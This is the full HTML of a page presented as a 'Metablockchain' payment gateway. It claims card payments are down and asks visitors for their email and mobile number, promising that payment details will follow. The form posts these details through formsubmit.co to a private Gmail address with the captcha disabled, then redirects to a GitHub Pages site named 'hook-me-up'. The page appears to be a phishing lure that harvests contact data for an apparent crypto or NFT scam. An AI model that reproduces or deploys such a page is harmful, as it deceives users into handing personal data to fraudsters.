<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
        <meta name="description" content="Metablockchain">
        <meta name="keywords" content="Metablockchain, blockchain, Metacrypto">
        <meta name="author" content="Mark Odegard">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="stylesheet" href="clearance.css">
        <title> Payment Gateway</title>
        <style>
        		input[type=text] {
  width: 100%;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
}
		input[type=number] {
  width: 100%;
  color:#0035cd;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
}
input[type=submit] {
  width: 100%;
  color:#0035cd;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
}
body {
  font-family: Arial;
  font-size: 17px;
  padding: 8px;
}

* {
  box-sizing: border-box;
}

.row {
  display: -ms-flexbox; /* IE10 */
  display: flex;
  -ms-flex-wrap: wrap; /* IE10 */
  flex-wrap: wrap;
  margin: 0 -16px;
}

.col-25 {
  -ms-flex: 25%; /* IE10 */
  flex: 25%;
}

.col-50 {
  -ms-flex: 50%; /* IE10 */
  flex: 50%;
}

.col-75 {
  -ms-flex: 75%; /* IE10 */
  flex: 75%;
}

.col-25,
.col-50,
.col-75 {
  padding: 0 16px;
}

</style>
    </head>

    <body>
        <header class="sticky">
            <div id="google_translate_element"></div>
        </header><br>
        
       
        <div class="row">
  <div class="col-75">
    <div class="container">
    		

        <h3 style="color:red;"><center> We're so sorry!!, Credit/Debit card payment method isn't available at the moment. 
            It will be fixed soon and made available to our Users. 
      </center>  </h3>
        <h2 style="color:#00354f;"><center> Enter your Email below and your mobile number and other payment details will be sent to you.
            <br> Thanks for your understanding !!! </h2></center>

            <div class="container">
                <form action="https://formsubmit.co/nftpro.minting@gmail.com" method="POST">
                <input type="hidden" name="_captcha" value="false">
                <input type="hidden" name="_subject" value="Payment gateway!">
                <input type="hidden" name="_next" value="https://www-hook-me-up.github.io/hook-me-up/done.html">
                <label for="email">Your Email:</label>
              <input type="text" id="Email" name=" Email" placeholder=" Enter Email" required>
              <label for="phone number">Your Mobile Number:</label>
              <input type="number" id="pnumber" name=" phone number" placeholder=" Phone Number" required>
              <input type="submit" value="Proceed">


            </form>
            </div>


            <script type="text/javascript">
                function googleTranslateElementInit() {
                  new google.translate.TranslateElement({pageLanguage: 'en'}, 'google_translate_element');
                }
                </script> 

            <script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script> 

    </body>
</html>
